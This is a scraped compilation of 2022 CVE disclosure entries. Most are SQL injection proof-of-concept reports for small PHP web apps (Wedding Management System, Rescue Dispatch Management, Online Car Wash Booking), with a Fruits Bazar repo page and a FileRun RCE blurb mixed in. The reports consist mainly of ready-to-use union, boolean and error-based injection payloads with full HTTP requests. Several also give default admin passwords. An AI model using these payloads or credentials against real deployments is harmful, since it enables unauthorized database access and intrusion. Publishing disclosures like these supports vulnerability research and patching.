Wedding Management System v1.0 is vulnerable to SQL injection via /Wedding-Management/admin/blog_events_edit.php?id=31.

Permalink

Cannot retrieve contributors at this time

**Wedding Management System v1.0 by codeastr.com has SQL injection**

Author： k0xx

The password for the backend login account is: admin@mail.com/Password@123

vendors: https://codeastro.com/wedding-management-system-in-php-with-source-code/

Vulnerability File: /Wedding-Management/admin/client\_edit.php?booking=31&user\_id=

Vulnerability location: /Wedding-Management/admin/client\_edit.php?booking=31&user\_id=,user\_id

\[+\] Payload: /Wedding-Management/admin/client\_edit.php?booking=31&user\_id=31%20and%20length%20(database())%20=9 // Leak place ---> user\_id

Current database name: dbwedding,length is 9

GET /Wedding\-Management/admin/client\_edit.php?booking\=31&user\_id\=31%20and%20length%20(database())%20\=9 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

When length (database ()) = 8, Content-Length: 14701

When length (database ()) = 9, Content-Length: 14095

CVE-2022-30818: bug_report/SQLi-10.md at main · k0xx11/bug_report

Wedding Management System v1.0 is vulnerable to SQL Injection via admin\client_assign.php.

Permalink

Cannot retrieve contributors at this time

**Wedding Management System v1.0 by codeastr.com has SQL injection**

vendors: https://codeastro.com/wedding-management-system-in-php-with-source-code/

Vulnerability File: \\admin\\client\_assign.php

Vulnerability location: /Wedding-Management/admin/client\_assign.php?booking=, booking

\[+\] Payload: booking=-31%20union%20select%201,2,3,4,5,database(),7,8--+

dbname = dbwedding

GET /Wedding\-Management/admin/client\_assign.php?booking\=\-31%20union%20select%201,2,3,4,5,database(),7,8\--+&user\_id=31 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

CVE-2022-30826: bug_report/SQLi-3.md at main · k0xx11/bug_report

Wedding Management System v1.0 is vulnerable to SQL Injection via \admin\photos_edit.php.

**Wedding Management System v1.0 by codeastr.com has SQL injection**

vendors: https://codeastro.com/wedding-management-system-in-php-with-source-code/

Vulnerability File: \\admin\\photos\_edit.php

Vulnerability location: /Wedding-Management/admin/photos\_edit.php?id=, id

\[+\] Payload: id=-37%20union%20select%201,2,database(),4,5,6,7,8,9,10--+

dbname = dbwedding

GET /Wedding\-Management/admin/photos\_edit.php?id\=\-37%20union%20select%201,2,database(),4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

CVE-2022-30828: bug_report/SQLi-6.md at main · k0xx11/bug_report

Wedding Management System v1.0 is vulnerable to SQL Injection via \admin\package_edit.php.

Permalink

**Wedding Management System v1.0 by codeastr.com has SQL injection**

vendors: https://codeastro.com/wedding-management-system-in-php-with-source-code/

Vulnerability File: \\admin\\package\_edit.php

Vulnerability location: /Wedding-Management/admin/package\_edit.php?id=, id

\[+\] Payload: id=-1%20union%20select%201,2,database(),4--+

dbname = dbwedding

GET /Wedding\-Management/admin/package\_edit.php?id\=\-1%20union%20select%201,2,database(),4\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

CVE-2022-30827: bug_report/SQLi-4.md at main · k0xx11/bug_report

Ecommerce-project-with-php-and-mysqli-Fruits-Bazar 1.0 is vulnerable to SQL Injection in \search_product.php via the keyword parameters.

creativesaiful / **Ecommerce-project-with-php-and-mysqli-Fruits-Bazar-** Public

*   Notifications
*   Fork 2
*   Star 3
    

This is an eCommerce project using Php, javaScript, Jquery, and Mysql.

3 stars 2 forks

Star

Notifications

*   Code
*   Issues
*   Pull requests
*   Actions
*   Projects
*   Wiki
*   Security
*   Insights

More

master

Switch branches/tags

**1** branch **0** tags

Code

**Latest commit**

creativesaiful somthing

c07a847

Sep 16, 2021

somthing

c07a847

**Git stats**

*   **25** commits

**Files**Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

admin

assets

includes

json

addtocart.php

all\_product.php

catagory.php

ecommerce.sql

exist\_order.php

index.php

readme.txt

search\_product.php

single\_product.php

user\_login.php

user\_password\_recover.php

user\_password\_update.php

user\_register.php

userprofile copy.php

userprofile.php

**readme.txt**

1\. First create a database name ecommerce in your database. Than import ecommerce.sql file in your ecommerce database.

admin access:
saifulislamsapon@gmail.com
pass:1234


user access:
saifulislamsapon@gmail.com
123

**About**

This is an eCommerce project using Php, javaScript, Jquery, and Mysql.

**Topics**

ecommerce-website php-website php-project core-php project-samples php-admin-panel project-example basic-ecommerce full-stack-web-development

**Resources**

Readme

**Stars**

**3** stars

**Watchers**

**1** watching

**Forks**

**2** forks

**Releases**

No releases published

**Packages**

No packages published  

**Languages**

*   CSS 36.7%
*   JavaScript 29.0%
*   SCSS 25.1%
*   PHP 8.6%
*   Hack 0.6%

CVE-2022-30478: GitHub - creativesaiful/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar-: This is an eCommerce project using Php, javaScript, Jquery, and Mysql.

In Afian Filerun 20220202 Changing the "search_tika_path" variable to a custom (and previously uploaded) jar file results in remote code execution in the context of the webserver user.

CVE-2022-30470: FileRun - Selfhosted File Manager with Sharing and Backup for Photos, Docs & More

Rescue Dispatch Management System v1.0 is vulnerable to SQL Injection via rdms/admin/respondent_types/view_respondent_type.php?id=.

**Rescue Dispatch Management System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15296/rescue-dispatch-management-system-phpoop-free-source-code.html

Vulnerability File: rdms/admin/respondent\_types/view\_respondent\_type.php?id=

Vulnerability location: /rdms/admin/respondent\_types/view\_respondent\_type.php?id=,id

\[+\] Payload: /rdms/admin/respondent\_types/view\_respondent\_type.php?id=1%27%20and%20length(database())%20=7--+ // Leak place ---> id

Current database name: rdms\_db,length is 7

GET /rdms/admin/respondent\_types/view\_respondent\_type.php?id\=1%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=hkbchcmaitn0d8enhm4jtdjk9q
Connection: close

When length (database ()) = 6, Content-Length: 799 

When length (database ()) = 7, Content-Length: 653

CVE-2022-31964: bug_report/SQLi-11.md at main · k0xx11/bug_report

Wedding Management System v1.0 is vulnerable to SQL Injection via \admin\client_edit.php.

Permalink

Cannot retrieve contributors at this time

**Wedding Management System v1.0 by codeastr.com has SQL injection**

vendors: https://codeastro.com/wedding-management-system-in-php-with-source-code/

Vulnerability File: \\admin\\client\_edit.php

Vulnerability location: /Wedding-Management/admin/client\_edit.php?booking=, booking

\[+\] Payload: booking=-31%20union%20select%201,2,3,4,5,user(),7,8--+

dbname = dbwedding

GET /Wedding\-Management/admin/client\_edit.php?booking\=\-31%20union%20select%201,2,3,4,5,user(),7,8\--+&user\_id=31 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

CVE-2022-30825: bug_report/SQLi-2.md at main · k0xx11/bug_report

Wedding Management System v1.0 is vulnerable to SQL Injection via \admin\blog_events_edit.php.

**Wedding Management System v1.0 by codeastr.com has SQL injection**

vendors: https://codeastro.com/wedding-management-system-in-php-with-source-code/

Vulnerability File: \\admin\\blog\_events\_edit.php

Vulnerability location: /Wedding-Management/admin/blog\_events\_edit.php?id=, id

\[+\] Payload: id=-31%20union%20select%201,database(),3,4,5,6,7,8,9,10--+

dbname = dbwedding

GET /Wedding\-Management/admin/blog\_events\_edit.php?id\=\-31%20union%20select%201,database(),3,4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

CVE-2022-30823: bug_report/SQLi-1.md at main · k0xx11/bug_report

Online Car Wash Booking System v1.0 is vulnerable to SQL Injection via /ocwbs/classes/Master.php?f=delete_vehicle.

Permalink

**Online Car Wash Booking System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html

Vulnerability File: /ocwbs/classes/Master.php?f=delete\_vehicle

Vulnerability location: /ocwbs/classes/Master.php?f=delete\_vehicle, id

\[+\] Payload: id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /ocwbs/classes/Master.php?f\=delete\_vehicle HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/ocwbs/admin/?page=vehicles
Content-Length: 65
Cookie: PHPSESSID=qr1o26kvu55cqqitadqht6jna5
Connection: close
id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

Tag

#sql